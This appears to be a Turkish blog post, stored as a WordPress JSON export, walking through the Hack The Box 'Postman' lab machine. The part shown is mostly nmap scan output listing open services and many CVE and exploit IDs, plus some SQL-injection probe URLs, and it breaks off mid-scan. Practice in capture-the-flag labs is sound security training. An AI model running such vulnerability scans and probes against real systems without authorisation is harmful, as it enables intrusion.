{"id":1507,"date":"2021-08-13T16:36:22","date_gmt":"2021-08-13T16:36:22","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1507"},"modified":"2021-08-13T16:38:07","modified_gmt":"2021-08-13T16:38:07","slug":"postman","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/08\/13\/postman\/","title":{"rendered":"Postman"},"content":{"rendered":"<table>\n<thead>\n<tr>\n<th>Makine Ad\u0131<\/th>\n<th>Seviye<\/th>\n<th>OS<\/th>\n<th>Logo<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td><a href=\"https:\/\/app.hackthebox.eu\/machines\/Postman\/walkthroughs\" title=\"Postman\">Postman<\/a> - HTB<\/td>\n<td>Kolay<\/td>\n<td>Linux<\/td>\n<td><img decoding=\"async\" src=\"https:\/\/www.hackthebox.eu\/storage\/avatars\/ad38e890e4e93afce51118bec4b9f48b.png\" alt=\"\" \/><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>Walkthrough<\/h2>\n<p>nmap taramas\u0131 ile ba\u015flayal\u0131m.<\/p>\n<pre><code class=\"language-sh\">\nPORT      STATE SERVICE VERSION\n22\/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| vulners: \n|   cpe:\/a:openbsd:openssh:7.6p1: \n|       EDB-ID:21018    10.0    https:\/\/vulners.com\/exploitdb\/EDB-ID:21018  *EXPLOIT*\n|       CVE-2001-0554   10.0    https:\/\/vulners.com\/cve\/CVE-2001-0554\n|       MSF:ILITIES\/UBUNTU-CVE-2019-6111\/   5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/UBUNTU-CVE-2019-6111\/    *EXPLOIT*\n|       MSF:ILITIES\/SUSE-CVE-2019-6111\/ 5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/SUSE-CVE-2019-6111\/  *EXPLOIT*\n|       MSF:ILITIES\/SUSE-CVE-2019-25017\/    5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/SUSE-CVE-2019-25017\/ *EXPLOIT*\n|       MSF:ILITIES\/REDHAT_LINUX-CVE-2019-6111\/ 5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/REDHAT_LINUX-CVE-2019-6111\/  *EXPLOIT*\n|       MSF:ILITIES\/REDHAT-OPENSHIFT-CVE-2019-6111\/ 5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/REDHAT-OPENSHIFT-CVE-2019-6111\/  *EXPLOIT*\n|       MSF:ILITIES\/ORACLE-SOLARIS-CVE-2019-6111\/   5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/ORACLE-SOLARIS-CVE-2019-6111\/    *EXPLOIT*\n|       MSF:ILITIES\/OPENBSD-OPENSSH-CVE-2019-6111\/  5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/OPENBSD-OPENSSH-CVE-2019-6111\/   *EXPLOIT*\n|       MSF:ILITIES\/IBM-AIX-CVE-2019-6111\/  5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/IBM-AIX-CVE-2019-6111\/   *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP8-CVE-2019-6111\/   5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP8-CVE-2019-6111\/    *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP5-CVE-2019-6111\/   5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP5-CVE-2019-6111\/    *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP3-CVE-2019-6111\/   5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP3-CVE-2019-6111\/    *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2019-6111\/   5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2019-6111\/    *EXPLOIT*\n|       MSF:ILITIES\/GENTOO-LINUX-CVE-2019-6111\/ 5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/GENTOO-LINUX-CVE-2019-6111\/  *EXPLOIT*\n|       MSF:ILITIES\/F5-BIG-IP-CVE-2019-6111\/    5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/F5-BIG-IP-CVE-2019-6111\/ *EXPLOIT*\n|       MSF:ILITIES\/DEBIAN-CVE-2019-6111\/   5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/DEBIAN-CVE-2019-6111\/    *EXPLOIT*\n|       MSF:ILITIES\/CENTOS_LINUX-CVE-2019-6111\/ 5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/CENTOS_LINUX-CVE-2019-6111\/  *EXPLOIT*\n|       MSF:ILITIES\/AMAZON_LINUX-CVE-2019-6111\/ 5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/AMAZON_LINUX-CVE-2019-6111\/  *EXPLOIT*\n|       MSF:ILITIES\/AMAZON-LINUX-AMI-2-CVE-2019-6111\/   5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/AMAZON-LINUX-AMI-2-CVE-2019-6111\/    *EXPLOIT*\n|       MSF:ILITIES\/ALPINE-LINUX-CVE-2019-6111\/ 5.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/ALPINE-LINUX-CVE-2019-6111\/  *EXPLOIT*\n|       EXPLOITPACK:98FE96309F9524B8C84C508837551A19    5.8 https:\/\/vulners.com\/exploitpack\/EXPLOITPACK:98FE96309F9524B8C84C508837551A19    *EXPLOIT*\n|       EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97    5.8 https:\/\/vulners.com\/exploitpack\/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97    *EXPLOIT*\n|       EDB-ID:46516    5.8 https:\/\/vulners.com\/exploitdb\/EDB-ID:46516  *EXPLOIT*\n|       CVE-2019-6111   5.8 https:\/\/vulners.com\/cve\/CVE-2019-6111\n|       SSH_ENUM    5.0 https:\/\/vulners.com\/canvas\/SSH_ENUM *EXPLOIT*\n|       PACKETSTORM:150621  5.0 https:\/\/vulners.com\/packetstorm\/PACKETSTORM:150621  *EXPLOIT*\n|       MSF:AUXILIARY\/SCANNER\/SSH\/SSH_ENUMUSERS 5.0 https:\/\/vulners.com\/metasploit\/MSF:AUXILIARY\/SCANNER\/SSH\/SSH_ENUMUSERS  *EXPLOIT*\n|       EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0    5.0 https:\/\/vulners.com\/exploitpack\/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0    *EXPLOIT*\n|       EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283    5.0 https:\/\/vulners.com\/exploitpack\/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283    *EXPLOIT*\n|       EDB-ID:45939    5.0 https:\/\/vulners.com\/exploitdb\/EDB-ID:45939  *EXPLOIT*\n|       CVE-2018-15919  5.0 https:\/\/vulners.com\/cve\/CVE-2018-15919\n|       CVE-2018-15473  5.0 https:\/\/vulners.com\/cve\/CVE-2018-15473\n|       1337DAY-ID-31730    5.0 https:\/\/vulners.com\/zdt\/1337DAY-ID-31730    *EXPLOIT*\n|       EDB-ID:45233    4.6 https:\/\/vulners.com\/exploitdb\/EDB-ID:45233  *EXPLOIT*\n|       MSF:ILITIES\/OPENBSD-OPENSSH-CVE-2020-14145\/ 4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/OPENBSD-OPENSSH-CVE-2020-14145\/  *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145\/  4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145\/   *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145\/  4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145\/   *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145\/  4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145\/   *EXPLOIT*\n|       MSF:ILITIES\/F5-BIG-IP-CVE-2020-14145\/   4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/F5-BIG-IP-CVE-2020-14145\/    *EXPLOIT*\n|       CVE-2020-14145  4.3 https:\/\/vulners.com\/cve\/CVE-2020-14145\n|       CVE-2007-2768   4.3 https:\/\/vulners.com\/cve\/CVE-2007-2768\n|       CVE-2019-6110   4.0 https:\/\/vulners.com\/cve\/CVE-2019-6110\n|       CVE-2019-6109   4.0 https:\/\/vulners.com\/cve\/CVE-2019-6109\n|       CVE-2018-20685  2.6 https:\/\/vulners.com\/cve\/CVE-2018-20685\n|       PACKETSTORM:151227  0.0 https:\/\/vulners.com\/packetstorm\/PACKETSTORM:151227  *EXPLOIT*\n|       EDB-ID:46193    0.0 https:\/\/vulners.com\/exploitdb\/EDB-ID:46193  *EXPLOIT*\n|       1337DAY-ID-32009    0.0 https:\/\/vulners.com\/zdt\/1337DAY-ID-32009    *EXPLOIT*\n|_      1337DAY-ID-30937    0.0 https:\/\/vulners.com\/zdt\/1337DAY-ID-30937    *EXPLOIT*\n80\/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))\n|_http-csrf: Couldn&#039;t find any CSRF vulnerabilities.\n|_http-dombased-xss: Couldn&#039;t find any DOM based XSS.\n| http-enum: \n|   \/css\/: Potentially interesting directory w\/ listing on &#039;apache\/2.4.29 (ubuntu)&#039;\n|   \/images\/: Potentially interesting directory w\/ listing on &#039;apache\/2.4.29 (ubuntu)&#039;\n|   \/js\/: Potentially interesting directory w\/ listing on &#039;apache\/2.4.29 (ubuntu)&#039;\n|_  \/upload\/: Potentially interesting directory w\/ listing on &#039;apache\/2.4.29 (ubuntu)&#039;\n| http-internal-ip-disclosure: \n|_  Internal IP Leaked: 127.0.1.1\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\n| http-sql-injection: \n|   Possible sqli for queries:\n|     http:\/\/10.10.10.160:80\/js\/?C=D%3bO%3dA%27%20OR%20sqlspider\n|     http:\/\/10.10.10.160:80\/js\/?C=N%3bO%3dD%27%20OR%20sqlspider\n|     http:\/\/10.10.10.160:80\/js\/?C=S%3bO%3dA%27%20OR%20sqlspider\n|     http:\/\/10.10.10.160:80\/js\/?C=M%3bO%3dA%27%20OR%20sqlspider\n|     http:\/\/10.10.10.160:80\/js\/?C=N%3bO%3dA%27%20OR%20sqlspider\n|     http:\/\/10.10.10.160:80\/js\/?C=M%3bO%3dA%27%20OR%20sqlspider\n|     http:\/\/10.10.10.160:80\/js\/?C=S%3bO%3dA%27%20OR%20sqlspider\n|_    http:\/\/10.10.10.160:80\/js\/?C=D%3bO%3dD%27%20OR%20sqlspider\n|_http-stored-xss: Couldn&#039;t find any stored XSS vulnerabilities.\n| vulners: \n|   cpe:\/a:apache:http_server:2.4.29: \n|       CVE-2021-26691  7.5 https:\/\/vulners.com\/cve\/CVE-2021-26691\n|       MSF:ILITIES\/REDHAT_LINUX-CVE-2019-0211\/ 7.2 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/REDHAT_LINUX-CVE-2019-0211\/  *EXPLOIT*\n|       MSF:ILITIES\/IBM-HTTP_SERVER-CVE-2019-0211\/  7.2 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/IBM-HTTP_SERVER-CVE-2019-0211\/   *EXPLOIT*\n|       EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB    7.2 https:\/\/vulners.com\/exploitpack\/EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB    *EXPLOIT*\n|       CVE-2019-0211   7.2 https:\/\/vulners.com\/cve\/CVE-2019-0211\n|       1337DAY-ID-32502    7.2 https:\/\/vulners.com\/zdt\/1337DAY-ID-32502    *EXPLOIT*\n|       MSF:ILITIES\/UBUNTU-CVE-2018-1312\/   6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/UBUNTU-CVE-2018-1312\/    *EXPLOIT*\n|       MSF:ILITIES\/UBUNTU-CVE-2017-15715\/  6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/UBUNTU-CVE-2017-15715\/   *EXPLOIT*\n|       MSF:ILITIES\/SUSE-CVE-2017-15715\/    6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/SUSE-CVE-2017-15715\/ *EXPLOIT*\n|       MSF:ILITIES\/REDHAT_LINUX-CVE-2017-15715\/    6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/REDHAT_LINUX-CVE-2017-15715\/ *EXPLOIT*\n|       MSF:ILITIES\/ORACLE_LINUX-CVE-2017-15715\/    6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/ORACLE_LINUX-CVE-2017-15715\/ *EXPLOIT*\n|       MSF:ILITIES\/ORACLE-SOLARIS-CVE-2017-15715\/  6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/ORACLE-SOLARIS-CVE-2017-15715\/   *EXPLOIT*\n|       MSF:ILITIES\/IBM-HTTP_SERVER-CVE-2017-15715\/ 6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/IBM-HTTP_SERVER-CVE-2017-15715\/  *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312\/   6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312\/    *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715\/  6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715\/   *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312\/   6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312\/    *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715\/  6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715\/   *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312\/   6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312\/    *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP1-CVE-2017-15715\/  6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP1-CVE-2017-15715\/   *EXPLOIT*\n|       MSF:ILITIES\/FREEBSD-CVE-2017-15715\/ 6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/FREEBSD-CVE-2017-15715\/  *EXPLOIT*\n|       MSF:ILITIES\/DEBIAN-CVE-2017-15715\/  6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/DEBIAN-CVE-2017-15715\/   *EXPLOIT*\n|       MSF:ILITIES\/CENTOS_LINUX-CVE-2017-15715\/    6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/CENTOS_LINUX-CVE-2017-15715\/ *EXPLOIT*\n|       MSF:ILITIES\/APACHE-HTTPD-CVE-2017-15715\/    6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/APACHE-HTTPD-CVE-2017-15715\/ *EXPLOIT*\n|       MSF:ILITIES\/AMAZON_LINUX-CVE-2017-15715\/    6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/AMAZON_LINUX-CVE-2017-15715\/ *EXPLOIT*\n|       MSF:ILITIES\/ALPINE-LINUX-CVE-2018-1312\/ 6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/ALPINE-LINUX-CVE-2018-1312\/  *EXPLOIT*\n|       MSF:ILITIES\/ALPINE-LINUX-CVE-2017-15715\/    6.8 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/ALPINE-LINUX-CVE-2017-15715\/ *EXPLOIT*\n|       CVE-2020-35452  6.8 https:\/\/vulners.com\/cve\/CVE-2020-35452\n|       CVE-2018-1312   6.8 https:\/\/vulners.com\/cve\/CVE-2018-1312\n|       CVE-2017-15715  6.8 https:\/\/vulners.com\/cve\/CVE-2017-15715\n|       CVE-2019-10082  6.4 https:\/\/vulners.com\/cve\/CVE-2019-10082\n|       MSF:ILITIES\/REDHAT_LINUX-CVE-2019-0217\/ 6.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/REDHAT_LINUX-CVE-2019-0217\/  *EXPLOIT*\n|       MSF:ILITIES\/IBM-HTTP_SERVER-CVE-2019-0217\/  6.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/IBM-HTTP_SERVER-CVE-2019-0217\/   *EXPLOIT*\n|       CVE-2019-0217   6.0 https:\/\/vulners.com\/cve\/CVE-2019-0217\n|       EDB-ID:47689    5.8 https:\/\/vulners.com\/exploitdb\/EDB-ID:47689  *EXPLOIT*\n|       CVE-2020-1927   5.8 https:\/\/vulners.com\/cve\/CVE-2020-1927\n|       CVE-2019-10098  5.8 https:\/\/vulners.com\/cve\/CVE-2019-10098\n|       1337DAY-ID-33577    5.8 https:\/\/vulners.com\/zdt\/1337DAY-ID-33577    *EXPLOIT*\n|       MSF:ILITIES\/UBUNTU-CVE-2018-1333\/   5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/UBUNTU-CVE-2018-1333\/    *EXPLOIT*\n|       MSF:ILITIES\/UBUNTU-CVE-2018-1303\/   5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/UBUNTU-CVE-2018-1303\/    *EXPLOIT*\n|       MSF:ILITIES\/UBUNTU-CVE-2017-15710\/  5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/UBUNTU-CVE-2017-15710\/   *EXPLOIT*\n|       MSF:ILITIES\/REDHAT_LINUX-CVE-2020-9490\/ 5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/REDHAT_LINUX-CVE-2020-9490\/  *EXPLOIT*\n|       MSF:ILITIES\/ORACLE_LINUX-CVE-2020-9490\/ 5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/ORACLE_LINUX-CVE-2020-9490\/  *EXPLOIT*\n|       MSF:ILITIES\/ORACLE-SOLARIS-CVE-2020-1934\/   5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/ORACLE-SOLARIS-CVE-2020-1934\/    *EXPLOIT*\n|       MSF:ILITIES\/ORACLE-SOLARIS-CVE-2017-15710\/  5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/ORACLE-SOLARIS-CVE-2017-15710\/   *EXPLOIT*\n|       MSF:ILITIES\/IBM-HTTP_SERVER-CVE-2017-15710\/ 5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/IBM-HTTP_SERVER-CVE-2017-15710\/  *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP9-CVE-2020-9490\/   5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP9-CVE-2020-9490\/    *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP8-CVE-2020-9490\/   5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP8-CVE-2020-9490\/    *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710\/  5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710\/   *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710\/  5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710\/   *EXPLOIT*\n|       MSF:ILITIES\/FREEBSD-CVE-2020-9490\/  5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/FREEBSD-CVE-2020-9490\/   *EXPLOIT*\n|       MSF:ILITIES\/CENTOS_LINUX-CVE-2020-9490\/ 5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/CENTOS_LINUX-CVE-2020-9490\/  *EXPLOIT*\n|       MSF:ILITIES\/CENTOS_LINUX-CVE-2017-15710\/    5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/CENTOS_LINUX-CVE-2017-15710\/ *EXPLOIT*\n|       MSF:ILITIES\/APACHE-HTTPD-CVE-2020-9490\/ 5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/APACHE-HTTPD-CVE-2020-9490\/  *EXPLOIT*\n|       MSF:ILITIES\/AMAZON-LINUX-AMI-2-CVE-2020-9490\/   5.0 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/AMAZON-LINUX-AMI-2-CVE-2020-9490\/    *EXPLOIT*\n|       CVE-2021-26690  5.0 https:\/\/vulners.com\/cve\/CVE-2021-26690\n|       CVE-2020-9490   5.0 https:\/\/vulners.com\/cve\/CVE-2020-9490\n|       CVE-2020-1934   5.0 https:\/\/vulners.com\/cve\/CVE-2020-1934\n|       CVE-2019-17567  5.0 https:\/\/vulners.com\/cve\/CVE-2019-17567\n|       CVE-2019-10081  5.0 https:\/\/vulners.com\/cve\/CVE-2019-10081\n|       CVE-2019-0220   5.0 https:\/\/vulners.com\/cve\/CVE-2019-0220\n|       CVE-2019-0196   5.0 https:\/\/vulners.com\/cve\/CVE-2019-0196\n|       CVE-2018-17199  5.0 https:\/\/vulners.com\/cve\/CVE-2018-17199\n|       CVE-2018-17189  5.0 https:\/\/vulners.com\/cve\/CVE-2018-17189\n|       CVE-2018-1333   5.0 https:\/\/vulners.com\/cve\/CVE-2018-1333\n|       CVE-2018-1303   5.0 https:\/\/vulners.com\/cve\/CVE-2018-1303\n|       CVE-2017-15710  5.0 https:\/\/vulners.com\/cve\/CVE-2017-15710\n|       MSF:ILITIES\/ORACLE-SOLARIS-CVE-2019-0197\/   4.9 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/ORACLE-SOLARIS-CVE-2019-0197\/    *EXPLOIT*\n|       CVE-2019-0197   4.9 https:\/\/vulners.com\/cve\/CVE-2019-0197\n|       MSF:ILITIES\/UBUNTU-CVE-2018-1302\/   4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/UBUNTU-CVE-2018-1302\/    *EXPLOIT*\n|       MSF:ILITIES\/UBUNTU-CVE-2018-1301\/   4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/UBUNTU-CVE-2018-1301\/    *EXPLOIT*\n|       MSF:ILITIES\/REDHAT_LINUX-CVE-2020-11993\/    4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/REDHAT_LINUX-CVE-2020-11993\/ *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP8-CVE-2020-11993\/  4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP8-CVE-2020-11993\/   *EXPLOIT*\n|       MSF:ILITIES\/DEBIAN-CVE-2019-10092\/  4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/DEBIAN-CVE-2019-10092\/   *EXPLOIT*\n|       MSF:ILITIES\/CENTOS_LINUX-CVE-2020-11993\/    4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/CENTOS_LINUX-CVE-2020-11993\/ *EXPLOIT*\n|       MSF:ILITIES\/APACHE-HTTPD-CVE-2020-11993\/    4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/APACHE-HTTPD-CVE-2020-11993\/ *EXPLOIT*\n|       MSF:ILITIES\/APACHE-HTTPD-CVE-2019-10092\/    4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/APACHE-HTTPD-CVE-2019-10092\/ *EXPLOIT*\n|       MSF:ILITIES\/AMAZON-LINUX-AMI-2-CVE-2020-11993\/  4.3 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/AMAZON-LINUX-AMI-2-CVE-2020-11993\/   *EXPLOIT*\n|       EDB-ID:47688    4.3 https:\/\/vulners.com\/exploitdb\/EDB-ID:47688  *EXPLOIT*\n|       CVE-2020-11993  4.3 https:\/\/vulners.com\/cve\/CVE-2020-11993\n|       CVE-2019-10092  4.3 https:\/\/vulners.com\/cve\/CVE-2019-10092\n|       CVE-2018-1302   4.3 https:\/\/vulners.com\/cve\/CVE-2018-1302\n|       CVE-2018-1301   4.3 https:\/\/vulners.com\/cve\/CVE-2018-1301\n|       CVE-2018-11763  4.3 https:\/\/vulners.com\/cve\/CVE-2018-11763\n|       1337DAY-ID-33575    4.3 https:\/\/vulners.com\/zdt\/1337DAY-ID-33575    *EXPLOIT*\n|       MSF:ILITIES\/UBUNTU-CVE-2018-1283\/   3.5 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/UBUNTU-CVE-2018-1283\/    *EXPLOIT*\n|       MSF:ILITIES\/REDHAT_LINUX-CVE-2018-1283\/ 3.5 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/REDHAT_LINUX-CVE-2018-1283\/  *EXPLOIT*\n|       MSF:ILITIES\/ORACLE-SOLARIS-CVE-2018-1283\/   3.5 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/ORACLE-SOLARIS-CVE-2018-1283\/    *EXPLOIT*\n|       MSF:ILITIES\/IBM-HTTP_SERVER-CVE-2018-1283\/  3.5 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/IBM-HTTP_SERVER-CVE-2018-1283\/   *EXPLOIT*\n|       MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283\/   3.5 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283\/    *EXPLOIT*\n|       MSF:ILITIES\/CENTOS_LINUX-CVE-2018-1283\/ 3.5 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/CENTOS_LINUX-CVE-2018-1283\/  *EXPLOIT*\n|       CVE-2018-1283   3.5 https:\/\/vulners.com\/cve\/CVE-2018-1283\n|       CVE-2020-13938  2.1 https:\/\/vulners.com\/cve\/CVE-2020-13938\n|       PACKETSTORM:152441  0.0 https:\/\/vulners.com\/packetstorm\/PACKETSTORM:152441  *EXPLOIT*\n|       EDB-ID:46676    0.0 https:\/\/vulners.com\/exploitdb\/EDB-ID:46676  *EXPLOIT*\n|       1337DAY-ID-663  0.0 https:\/\/vulners.com\/zdt\/1337DAY-ID-663  *EXPLOIT*\n|       1337DAY-ID-601  0.0 https:\/\/vulners.com\/zdt\/1337DAY-ID-601  *EXPLOIT*\n|       1337DAY-ID-4533 0.0 https:\/\/vulners.com\/zdt\/1337DAY-ID-4533 *EXPLOIT*\n|       1337DAY-ID-3109 0.0 https:\/\/vulners.com\/zdt\/1337DAY-ID-3109 *EXPLOIT*\n|_      1337DAY-ID-2237 0.0 https:\/\/vulners.com\/zdt\/1337DAY-ID-2237 *EXPLOIT*\n6379\/tcp  open  redis   Redis key-value store 4.0.9\n| vulners: \n|   cpe:\/a:redislabs:redis:4.0.9: \n|       CVE-2018-11219  7.5 https:\/\/vulners.com\/cve\/CVE-2018-11219\n|       CVE-2018-11218  7.5 https:\/\/vulners.com\/cve\/CVE-2018-11218\n|       MSF:ILITIES\/UBUNTU-CVE-2019-10193\/  6.5 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/UBUNTU-CVE-2019-10193\/   *EXPLOIT*\n|       MSF:ILITIES\/UBUNTU-CVE-2019-10192\/  6.5 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/UBUNTU-CVE-2019-10192\/   *EXPLOIT*\n|       MSF:ILITIES\/DEBIAN-CVE-2019-10192\/  6.5 https:\/\/vulners.com\/metasploit\/MSF:ILITIES\/DEBIAN-CVE-2019-10192\/   *EXPLOIT*\n|       CVE-2021-21309  6.5 https:\/\/vulners.com\/cve\/CVE-2021-21309\n|       CVE-2019-10193  6.5 https:\/\/vulners.com\/cve\/CVE-2019-10193\n|       CVE-2019-10192  6.5 https:\/\/vulners.com\/cve\/CVE-2019-10192\n|       CVE-2021-32761  6.0 https:\/\/vulners.com\/cve\/CVE-2021-32761\n|       EXPLOITPACK:9F45D8CAB6F6E66F98E43562AEAB5DE2    4.6 https:\/\/vulners.com\/exploitpack\/EXPLOITPACK:9F45D8CAB6F6E66F98E43562AEAB5DE2    *EXPLOIT*\n|       CVE-2018-12326  4.6 https:\/\/vulners.com\/cve\/CVE-2018-12326\n|       PACKETSTORM:148225  0.0 https:\/\/vulners.com\/packetstorm\/PACKETSTORM:148225  *EXPLOIT*\n|       EDB-ID:44904    0.0 https:\/\/vulners.com\/exploitdb\/EDB-ID:44904  *EXPLOIT*\n|_      1337DAY-ID-30598    0.0 https:\/\/vulners.com\/zdt\/1337DAY-ID-30598    *EXPLOIT*\n10000\/tcp open  http    MiniServ 1.910 (Webmin httpd)\n|_http-csrf: Couldn&#039;t find any CSRF 